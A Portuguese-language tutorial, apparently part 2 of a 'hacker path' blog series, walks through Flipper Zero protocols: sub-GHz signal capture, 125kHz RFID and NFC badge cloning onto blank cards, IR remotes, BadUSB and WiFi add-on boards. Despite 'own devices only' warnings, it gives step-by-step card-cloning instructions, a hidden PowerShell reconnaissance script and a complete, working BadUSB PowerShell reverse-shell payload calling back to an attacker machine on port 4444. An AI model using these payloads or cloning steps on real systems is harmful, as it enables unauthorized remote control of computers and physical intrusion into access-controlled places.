Domínio do Flipper Zero: Cada Protocolo, Cada Truque

O Caminho do Hacker: Série em 5 Partes

Parte 1: Introdução → Parte 2: Domínio do Flipper → Parte 3: Fundamentos do Kali → Parte 4: Exploração → Parte 5: A Auditoria Completa

Na Parte 1, você deu os primeiros passos. Clonou alguns controles IR, escaneou cartões NFC, assistiu o espectro sub-GHz acender e digitou "Hello World" com BadUSB. Você viu que a segurança é frequentemente uma ilusão.

Agora vamos fundo. Ao final deste artigo, você vai entender todos os principais protocolos com os quais o seu Flipper Zero pode interagir. Não apenas como usá-los, mas por que funcionam do jeito que funcionam e o que isso significa para a segurança.

Aviso justo: Você vai descobrir que várias coisas que assumia serem seguras... não são.

A Filosofia do Flipper

Antes de entrarmos nos protocolos, vamos estabelecer a mentalidade certa. O Flipper Zero não é um "dispositivo de hacking" no sentido hollywoodiano. É uma ferramenta de aprendizado que permite interagir com frequências de rádio e protocolos de hardware que normalmente são invisíveis.

Pense nele como uma lupa para sinais sem fio. Os sinais sempre estiveram lá. Você simplesmente não conseguia vê-los. Agora consegue.

Essa distinção importa porque muda como você aborda a segurança. A maioria da "segurança" se baseia na obscuridade, na suposição de que atacantes não saberão como interagir com um sistema. Seu Flipper remove essa obscuridade. Ele mostra exatamente o que está sendo transmitido e recebido. E quando você consegue ver, pode avaliar se existe segurança real.

Spoiler: Na maioria das vezes, não existe.

⚠️ Lembrete: Apenas Seus Dispositivos

Tudo neste artigo é para testar SEUS PRÓPRIOS dispositivos, cartões e sistemas. As técnicas funcionam no equipamento de qualquer pessoa, esse é o ponto. Mas usá-las em sistemas que não são seus é ilegal. Teste sua própria segurança. Descubra suas próprias vulnerabilidades. Esse é o caminho.

Sub-GHz: O Espectro Invisível

Frequências de rádio sub-gigahertz estão por toda parte. Sua porta de garagem, chaveiro do carro, estação meteorológica, campainha sem fio, sensores de pressão dos pneus, dispositivos de casa inteligente, todos transmitem constantemente em faixas de frequência abaixo de 1 GHz.

Por que sub-GHz? Frequências mais baixas viajam mais longe e penetram paredes melhor do que frequências mais altas como WiFi (2.4/5 GHz). Isso as torna perfeitas para dispositivos que precisam de comunicação confiável em distância sem necessidade de linha de visão.

O Panorama das Frequências

Diferentes regiões usam frequências diferentes por causa de regulamentações:

• 315 MHz: América do Norte. Portões de garagem antigos, chaveiros de carros
• 390 MHz: América do Norte. Portões de garagem, alguns automotivos
• 433.92 MHz: Mundial. Estações meteorológicas, sensores, dispositivos europeus, muitos produtos IoT
• 868 MHz: Europa. Casa inteligente, LoRa, medidores de energia
• 915 MHz: Américas. LoRa, casa inteligente, industrial

Com o firmware Momentum, seu Flipper pode transmitir e receber em todas essas bandas independentemente da sua localização física. O firmware original restringe às frequências legais da sua região. Isso importa para o aprendizado, pois você pode ter dispositivos operando em frequências "estrangeiras".

Projeto: Analise Sua Porta de Garagem

Tempo: 15 minutos

O que você vai aprender: A diferença entre códigos estáticos e códigos rotativos, e por que isso importa

Passos:

1. Navegue até Sub-GHz → Read
2. Fique perto da garagem (não tão perto que a porta abra)
3. Pressione o botão do controle da garagem
4. Observe o Flipper capturar o sinal
5. Examine o que foi capturado. Observe o protocolo identificado

O que você pode ver:

• Princeton, Linear, Chamberlain (antigo): Códigos estáticos. O mesmo código é transmitido toda vez. Vulnerável a ataques de replay.
• KeeLoq, Security+ 2.0, Rolling Code: Códigos rotativos. Cada transmissão usa um código diferente de uma sequência sincronizada. Não pode ser simplesmente repetido.

A realidade: Se sua porta de garagem usa código estático (muitas instaladas antes de ~2015 usam), qualquer pessoa que capture esse sinal uma vez pode repeti-lo para sempre. Sua garagem está protegida pela suposição de que ninguém está ouvindo. Essa suposição acabou de desmoronar.

Códigos Rotativos Explicados

Portões de garagem modernos e chaveiros de carros usam códigos rotativos (também chamados de códigos de salto). Funciona assim:

1. Tanto o transmissor (seu controle) quanto o receptor (sua garagem) compartilham uma semente secreta e um algoritmo
2. Cada pressionamento do botão gera o próximo código numa sequência sincronizada
3. O receptor aceita o código atual OU qualquer um dos próximos ~256 códigos (para lidar com pressionamentos fora de alcance)
4. Uma vez que um código é usado, ele é invalidado para sempre

Isso significa que capturar e repetir um sinal de código rotativo não funciona. Quando você tentar repeti-lo, o código já terá sido invalidado.

Por Que Isso Importa

Códigos rotativos foram inventados porque o mundo sub-GHz descobriu que segurança por obscuridade falha. Alguém descobriu como capturar e repetir sinais, então a indústria teve que implementar segurança criptográfica real. Esse padrão se repete em todos os protocolos que vamos discutir: segurança só é adicionada depois que alguém demonstra a vulnerabilidade.

Projeto: Capture Dados da Estação Meteorológica

Tempo: 10 minutos

O que você vai aprender: Quantos dados são transmitidos sem qualquer proteção

Passos:

1. Navegue até Sub-GHz → Read
2. Espere perto de qualquer sensor meteorológico sem fio (termômetro externo, pluviômetro, etc.)
3. A maioria transmite a cada 30-60 segundos
4. Capture a transmissão
5. Observe o protocolo e quaisquer dados decodificados

O que você vai encontrar: Temperatura, umidade, status da bateria, ID do sensor. Tudo transmitido em texto puro. Sem criptografia, sem autenticação. Qualquer receptor sintonizado nessa frequência recebe todos os dados. Agora pense no que mais na sua vizinhança está transmitindo...

RFID: O Mundo dos 125kHz

RFID de baixa frequência (125kHz) é a tecnologia de cartão de proximidade mais antiga e simples. Você encontra em cartões de academia, cartões de acesso de prédios comerciais antigos, estacionamentos e sistemas de entrada de condomínios.

E a segurança é quase universalmente terrível.

Como o RFID de 125kHz Funciona

Esses cartões são passivos, não têm bateria. Quando você segura um perto de um leitor, o campo eletromagnético do leitor alimenta o cartão, e o cartão transmite seu número de ID. Só isso. Sem desafio-resposta. Sem criptografia. Apenas: "Eu sou o cartão número 12345."

O leitor diz "ok" e concede acesso baseado unicamente em conhecer aquele número de ID.

Você vê o problema.

Tipos Comuns de Cartões 125kHz

• EM4100: Extremamente comum. Apenas transmite um ID de 40 bits. Zero segurança.
• HID Prox: O cartão de acesso corporativo mais comum. Transmite código da instalação + número do cartão. Zero segurança.
• Indala: Menos comum. Codificação diferente, mas o mesmo problema. Sem segurança.
• AWID: Outra variante. A mesma fraqueza fundamental.

Percebeu o padrão? Todos esses cartões simplesmente transmitem um ID. A "segurança" é que alguém precisaria de equipamento especializado para ler aquele ID. Seu Flipper é esse equipamento.

Projeto: Clone Seu Cartão da Academia

Tempo: 5 minutos

O que você precisa: Seu cartão de academia/piscina/condomínio de 125kHz, um cartão em branco T5577 ($1-2 cada)

Passos:

1. Navegue até 125 kHz RFID → Read
2. Segure seu cartão contra a parte traseira do Flipper (onde fica a antena RFID)
3. Aguarde a leitura bem-sucedida. Observe o tipo do cartão e o ID
4. Salve o cartão com um nome reconhecível
5. Para testar a emulação: Saved → Select Card → Emulate
6. Segure o Flipper no leitor da academia. Deve funcionar de forma idêntica ao seu cartão

Para gravar num T5577 em branco:

1. Vá ao seu cartão salvo
2. Selecione Write
3. Segure um cartão em branco T5577 no Flipper
4. Aguarde a confirmação de gravação
5. Agora você tem um clone físico

Por que isso importa: O modelo inteiro de segurança daquele sistema de controle de acesso acabou de desmoronar. Qualquer pessoa que consiga ficar perto do seu cartão por dois segundos pode cloná-lo. Pense nisso da próxima vez que deixar sua mochila no vestiário da academia.

O T5577: Seu Cartão Mágico

O T5577 é um cartão RFID regravável que pode emular a maioria dos tipos de cartão 125kHz. É como um CD-R em branco para cartões de acesso. Você pode gravar qualquer dado de cartão nele, e ele se torna aquele cartão.

Compre um pacote de 10 para testes. São baratos e incrivelmente úteis para entender como toda essa tecnologia é fraca. Você pode gravar dados de um cartão, testar, depois gravar dados diferentes. Tudo no mesmo cartão físico.

O Que Isso Revela

A "segurança" do RFID 125kHz é puro teatro. Esses sistemas assumem que você não pode ler o cartão, não pode copiar os dados e não pode gravá-los em outro cartão. As três suposições são falsas com equipamento de consumo. Se seu local de trabalho usa cartões HID Prox (o cartão de acesso corporativo mais comum), qualquer funcionário com um Flipper pode clonar o acesso de qualquer outro funcionário. Deixe isso assentar.

NFC: O Mundo dos 13.56MHz

NFC de alta frequência (13.56 MHz) é a geração mais recente. Alimenta pagamentos por aproximação, cartões de acesso modernos, sistemas de transporte, chaves de hotel e o pagamento por toque do seu celular.

A boa notícia: Alguns cartões NFC realmente têm segurança real.

A má notícia: Muitos não têm.

Tipos de Cartões NFC

• MIFARE Classic: Extremamente comum em cartões de acesso, transporte, hotéis. Usa criptografia proprietária que foi quebrada anos atrás. Vulnerável.
• MIFARE Ultralight: Cartões simples com segurança mínima. Frequentemente usados para bilhetes de transporte descartáveis.
• NTAG: Comum em tags NFC para automação. Geralmente segurança mínima.
• MIFARE DESFire: Realmente seguro. Usa criptografia AES. Usado em implantações de alta segurança mais recentes.
• EMV (Cartões de Pagamento): Seu cartão de crédito. Tem criptografia forte, limites de transação e detecção de fraude.

Projeto: Analise Seu Crachá do Trabalho

Tempo: 10 minutos

O que você vai aprender: Se seu local de trabalho tem segurança real ou teatro de segurança

Passos:

1. Navegue até NFC → Read
2. Segure seu crachá contra a parte traseira do Flipper
3. Aguarde a leitura completar
4. Examine o que o Flipper mostra

Interpretando os resultados:

• MIFARE Classic 1K/4K: Seu crachá usa criptografia já quebrada. Com tempo e as ferramentas certas, pode ser clonado.
• MIFARE Ultralight: Segurança mínima. Frequentemente clonável.
• MIFARE DESFire: Realmente seguro. Você verá dados limitados.
• Unknown/Locked: Pode ser proprietário ou DESFire. Mais investigação necessária.

Checagem de realidade: A maioria dos crachás corporativos ainda são MIFARE Classic. A criptografia foi quebrada publicamente em 2008. Dezoito anos atrás. Se seu crachá diz MIFARE Classic, seu empregador está rodando um sistema de segurança que criptógrafos consideram ridiculamente quebrado.

Clonagem de UID vs Clonagem Completa

Distinção importante: O Flipper sempre pode ler e emular o UID (Unique Identifier) de um cartão, o número de série. Alguns sistemas de acesso verificam apenas o UID. Para esses sistemas, emulação simples funciona.

Sistemas melhores verificam tanto o UID QUANTO dados criptografados armazenados no cartão. Para esses, você precisaria clonar também os setores criptografados. Possível para MIFARE Classic (a criptografia está quebrada), mas não para DESFire.

Projeto: Análise de Cartão-Chave de Hotel

Tempo: 5 minutos (na próxima vez que estiver em um hotel)

O que você vai aprender: Como a segurança de hotéis realmente funciona

Passos:

1. Leia seu cartão-chave do hotel com NFC → Read
2. Observe o tipo do cartão
3. Veja quais dados são legíveis

O que você geralmente encontra: A maioria das chaves de hotel são MIFARE Ultralight ou Classic. Algumas mostram número do quarto, data de checkout ou outros metadados em setores legíveis. A "segurança" é que hóspedes geralmente não têm leitores NFC. Agora você tem.

Cartões Mágicos para NFC

Assim como o T5577 para 125kHz, existem cartões NFC "mágicos" para 13.56MHz:

• Gen1 (UID Alterável): Pode gravar UID personalizado. Detectado por alguns leitores como "mágico."
• Gen2 (CUID): Melhor compatibilidade. Mudanças de UID persistem após ciclos de energia.
• Gen3 (UFUID): Pode bloquear o UID após gravação. Aparece como cartão normal.
• Gen4 (Ultimate Magic): O mais flexível. Pode emular múltiplos tipos de cartão.

Para aprendizado, cartões Gen2 são o equilíbrio ideal. Baratos, amplamente compatíveis e bons o suficiente para a maioria dos testes.

Infravermelho: Controle Total

Você já criou controles IR na Parte 1. Vamos mais fundo.

Construindo a Biblioteca de Controles Definitiva

O Flipper pode armazenar controles IR ilimitados. Mas aprender cada botão individualmente é tedioso. Melhor abordagem: use os bancos de dados da comunidade.

O firmware Momentum inclui IRDB, um banco de dados massivo de controles pré-capturados. Você também pode baixar controles de repositórios GitHub e adicioná-los ao cartão SD do Flipper.

Projeto: Construa Seu Arsenal IR

Tempo: 20 minutos

Passos:

1. No seu Flipper: Infrared → Universal Remotes
2. Você encontrará controles universais pré-construídos para TVs, ACs, projetores, etc.
3. Teste-os contra seus dispositivos
4. Para dispositivos não cobertos, use Learn New Remote
5. Organize os controles salvos por cômodo ou tipo de dispositivo

Jogada avançada: Crie "controles de cômodo" que combinam todos os dispositivos IR de um único espaço. Um arquivo controla TV, soundbar, luzes e AC.

O que você aprende: IR é universal e desprotegido. Qualquer dispositivo com um receptor IR pode ser controlado por qualquer dispositivo com um transmissor IR. Isso é intencional. O IR foi projetado para conveniência, não segurança. Seu Flipper apenas torna essa conveniência universal.

Captura de IR Raw

Alguns dispositivos usam protocolos IR não padronizados. Para esses, o Flipper pode capturar o sinal raw, o timing exato dos pulsos liga/desliga, e repeti-lo perfeitamente.

Navegue até Infrared → Learn New → Raw quando o aprendizado padrão não reconhecer um sinal.

BadUSB: A Alternativa ao Rubber Ducky

Na Parte 1, você fez o Flipper digitar "Hello World." Agora a coisa fica séria.

BadUSB (também conhecido como ataques USB Rubber Ducky) explora uma falha fundamental na forma como computadores lidam com dispositivos USB: eles confiam implicitamente em teclados. Quando você conecta um dispositivo que afirma ser um teclado, o computador aceita cada tecla digitada sem questionar.

Seu Flipper pode digitar aproximadamente 1.000 caracteres por segundo. Mais rápido que qualquer humano. Rápido o suficiente para executar ataques complexos antes que qualquer pessoa possa reagir.

Fundamentos do DuckyScript

Payloads BadUSB usam DuckyScript, uma linguagem de script simples. Comandos principais:

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

Projeto: Coletor de Informações do Sistema

Tempo: 15 minutos

O que faz: Abre o PowerShell, coleta informações do sistema, salva num arquivo (na SUA máquina)

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

O que você aprende: Em menos de 3 segundos de acesso físico, um atacante poderia coletar hostname, nome de usuário, domínio, endereços IP e versão do SO. Isso é reconhecimento. Imagine o que mais poderia ser digitado nesses 3 segundos.

Projeto: Configuração de Shell Reverso

Tempo: 30 minutos (incluindo configuração do Kali)

O que faz: Cria uma conexão de volta para sua máquina Kali (preparação para a Parte 3)

Pré-requisitos: Kali Linux rodando (VM serve), saber o endereço IP do seu Kali

No Kali, inicie o listener:

nc -lvnp 4444

Payload BadUSB (alvo Windows):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

O que acontece: A máquina-alvo abre uma conexão PowerShell de volta para seu Kali. Agora você tem acesso por linha de comando àquela máquina. Este é o núcleo de como acesso físico + BadUSB = comprometimento total. Vamos explorar mais na Parte 3.

⚠️ Esses Payloads São Reais

O payload de shell reverso acima realmente funciona. Use-o APENAS em máquinas que você possui para testes. Rodar isso na máquina de outra pessoa é crime federal (acesso não autorizado + instalação de backdoor). O objetivo é entender a ameaça, não criar uma.

Payloads Divertidos para Demonstrações

Para demonstrar BadUSB para outras pessoas (na máquina delas com permissão), aqui estão alguns payloads inofensivos mas impressionantes:

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER

REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11

REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: Expansão de Hardware

Os pinos GPIO (General Purpose Input/Output) do Flipper permitem conectar módulos externos e expandir capacidades. É aqui que o Flipper se transforma de ferramenta portátil em plataforma de desenvolvimento.

Módulos Essenciais

• WiFi Dev Board: Adiciona capacidades WiFi: captura de pacotes, testes de deauth, ataques Evil Twin. Essencial da Parte 3 em diante.
• Antena Externa CC1101: Estende drasticamente o alcance Sub-GHz. A antena interna funciona, mas a externa é melhor para trabalho sério.
• ESP32 Marauder: Transforma o Flipper numa plataforma de hacking WiFi/Bluetooth. Captura handshakes, executa ataques.
• ProtoBoard: Para projetos personalizados e conexão do seu próprio hardware.

Projeto: Configuração do WiFi Dev Board

Tempo: 20 minutos

O que você precisa: WiFi Dev Board (oficial ou ESP32 compatível)

Passos:

1. Faça flash do firmware Marauder no ESP32 (instruções em github.com/justcallmekoko/ESP32Marauder)
2. Conecte aos pinos GPIO do Flipper
3. Navegue até GPIO → ESP32 → Marauder
4. Agora você tem escaneamento WiFi, deauth e captura de pacotes

Por que isso importa: O Flipper sozinho não faz WiFi. Ele não tem o hardware de rádio adequado. Mas com a dev board, você pode escanear redes, capturar handshakes WPA e realizar ataques WiFi. Vamos usar isso extensivamente nas Partes 3 e 4.

Recursos Avançados do Momentum

Se você está rodando o firmware Momentum (deveria estar), aqui estão recursos que vale a pena explorar:

• Animações de Desktop: Puramente cosméticas, mas divertidas. Confira pacotes de animação da comunidade.
• Protocolos Estendidos: O Momentum adiciona suporte para protocolos que o firmware original não inclui.
• Hub de Aplicativos: Apps adicionais além do original. Jogos, ferramentas, utilidades especializadas.
• Pacotes de Assets Personalizados: Mude toda a aparência e experiência.

O valor real está nas frequências desbloqueadas e no suporte estendido a protocolos. O firmware original é intencionalmente limitado para conformidade legal/regulatória. O Momentum assume que você é um adulto que entende as regras.

O Que Você Dominou

Agora você entende:

• Sub-GHz: Como portões de garagem, chaveiros e sensores se comunicam, e por que códigos rotativos importam
• RFID 125kHz: Por que cartões de academia e crachás antigos são trivialmente clonáveis
• NFC 13.56MHz: A diferença entre criptografia quebrada (MIFARE Classic) e segurança real (DESFire)
• Infravermelho: Como construir uma biblioteca de controles universais e capturar sinais raw
• BadUSB: Por que a confiança USB HID é uma vulnerabilidade fundamental, e como explorá-la
• GPIO: Como expandir para WiFi, alcance estendido e hardware personalizado

Seu Flipper agora é uma arma. Mas é uma chave de fenda comparada ao Kali Linux, que é uma oficina inteira. Hora de iniciar o verdadeiro ambiente de hacking.

O Caminho do Hacker

Uma série em 5 partes levando você de curioso a capaz.

Parte 1: Introdução Parte 2: Domínio do Flipper ✓ Parte 3: Fundamentos do Kali Parte 4: Exploração Parte 5: Auditoria Completa

Checklist da Parte 2

☐ Sub-GHz: Porta de garagem analisada, códigos rotativos vs estáticos compreendidos

☐ RFID 125kHz: Cartões lidos, pelo menos um clone testado

☐ NFC: Crachá analisado, tipo de cartão identificado

☐ Infravermelho: Biblioteca completa de controles da casa construída

☐ BadUSB: Payload de informações do sistema testado, shell reverso compreendido

☐ GPIO: WiFi dev board pronta para a Parte 3

☐ Cartões Mágicos: T5577 e/ou cartões mágicos NFC adquiridos para testes

Próximos Passos

Na Parte 3, deixamos as capacidades focadas do Flipper e entramos no ambiente completo de testes de penetração: Kali Linux.

Você vai aprender:

• Montar seu laboratório de hacking (instalação e configuração de VM)
• Reconhecimento de rede com nmap: mapeando cada dispositivo na sua rede
• Reconhecimento wireless: capturando handshakes WiFi com aircrack-ng
• Reconhecimento web: descobrindo o que seu roteador expõe
• Conectando capturas do Flipper aos workflows do Kali

O Flipper mostrou que vulnerabilidades existem. O Kali ajuda você a entender exatamente quão profundas elas vão.

Nos vemos na Parte 3.